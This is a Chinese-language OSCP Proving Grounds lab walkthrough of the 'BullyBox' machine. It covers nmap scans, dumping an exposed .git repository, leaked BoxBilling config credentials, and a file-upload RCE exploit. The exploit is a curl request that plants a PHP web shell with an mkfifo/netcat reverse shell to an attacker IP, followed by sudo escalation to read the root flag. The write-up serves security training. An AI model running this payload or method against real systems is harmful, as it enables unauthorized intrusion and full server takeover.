OSCP - Proving Grounds

OSCP - Proving Grounds - BullyBox

主要知识点

如果发现有域名，则可以加入/etc/hosts后重新执行nmap,nikto等扫描
dirsearch的时候可以使用完整一些的字典文件，避免漏掉信息
.git dump

具体步骤

执行nmap 扫描，发现 80和22端口开放,访问后发现被重定向到 bullybox.local

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 12:20 UTC
Nmap scan report for 192.168.59.27
Host is up (0.00072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.52 (Ubuntu)

尝试修改/etc/hosts，将ip与bullybox.local绑定，之后重新执行nmap扫描，得到了更多的信息，比如.git路径，以及robots.txt中的entries

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 17:50 EDT
Nmap scan report for bullybox.local (192.168.174.27)
Host is up (0.44s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| /boxbilling/bb-data/ /bb-data/ /bb-library/ 
|_/bb-locale/ /bb-modules/ /bb-uploads/ /bb-vendor/ /install/
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Client Area 
| http-git: 
|   192.168.174.27:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Ready For launch 
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

访问robots.txt中的路径，得到疑似admin用户名

利用搜索引擎寻找可以dump .git的应用，得到GitHub - arthaud/git-dumper: A tool to dump a git repository from a website,尝试运行后，成功dump git代码库,如果配置了代理，记得调用unset http_proxy,否则会报502错误

C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
/home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://bullybox.local/.git/HEAD [502]
[-] http://bullybox.local//.git/HEAD responded with status code 502
                                                                                                                                                                                                                                            
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> unset http_proxy                                                                                           
                                                                                                                                                                                                                                            
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
/home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://bullybox.local/.git/HEAD [200]
[-] Testing http://bullybox.local/.git/ [403]
[-] Fetching common files
[-] Fetching http://bullybox.local/.git/hooks/post-update.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-commit.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/post-commit.sample [404]
[-] http://bullybox.local/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://bullybox.local/.git/description [200]
[-] Fetching http://bullybox.local/.gitignore [404]
[-] http://bullybox.local/.gitignore responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/post-receive.sample [404]
[-] http://bullybox.local/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://bullybox.local/.git/COMMIT_EDITMSG [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/commit-msg.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-push.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://bullybox.local/.git/index [200]
[-] Fetching http://bullybox.local/.git/objects/info/packs [404]
[-] http://bullybox.local/.git/objects/info/packs responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/pre-receive.sample [200]

执行cat /bb-config.php，发现疑似密码，结合已经发现的用户名admin@bullybox.local,登录成功

 array (
    'type' => 'mysql',
    'host' => 'localhost',
    'name' => 'boxbilling',
    'user' => 'admin',
    'password' => 'Playing-Unstylish7-Provided',
  ),

发现版本为4.22.1.5，搜索一下发现有文件上传漏洞BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) - PHP webapps Exploit，尝试利用一下

先利用firefox得到Cookie中保存的phpsessionid，并在本地启用nc -nlvp之后调用如下命令,我是用Postman调用的，会生成下面的curl命令

curl --location 'http://bullybox.local/index.php?_url=%2Fapi%2Fadmin%2FFilemanager%2Fsave_file' \
--header 'Cookie: PHPSESSID=tjlfj0mpf85cjgh8g0rjtc0jnn \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'order_id=1' \
--data-urlencode 'path=reverse.php' \
--data-urlencode 'data=<?php shell_exec('\''rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.209 80>/tmp/f'\''); ?>'

得到反弹shell,并且具备SUDO权限,可以直接拿到flag

C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox> nc -nlvp 80  
listening on [any] 80 ...
connect to [192.168.45.209] from (UNKNOWN) [192.168.226.27] 57090
bash: cannot set terminal process group (1311): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

yuki@bullybox:/var/www/bullybox$ id
id
uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)
yuki@bullybox:/var/www/bullybox$ sudo -l
sudo -l
Matching Defaults entries for yuki on bullybox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User yuki may run the following commands on bullybox:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
yuki@bullybox:/var/www/bullybox$ sudo cat /root/proof.txt
sudo cat /root/proof.txt
2cf1d3dd8eab874dd006dad9912c1388
yuki@bullybox:/var/www/bullybox$

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/956365.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！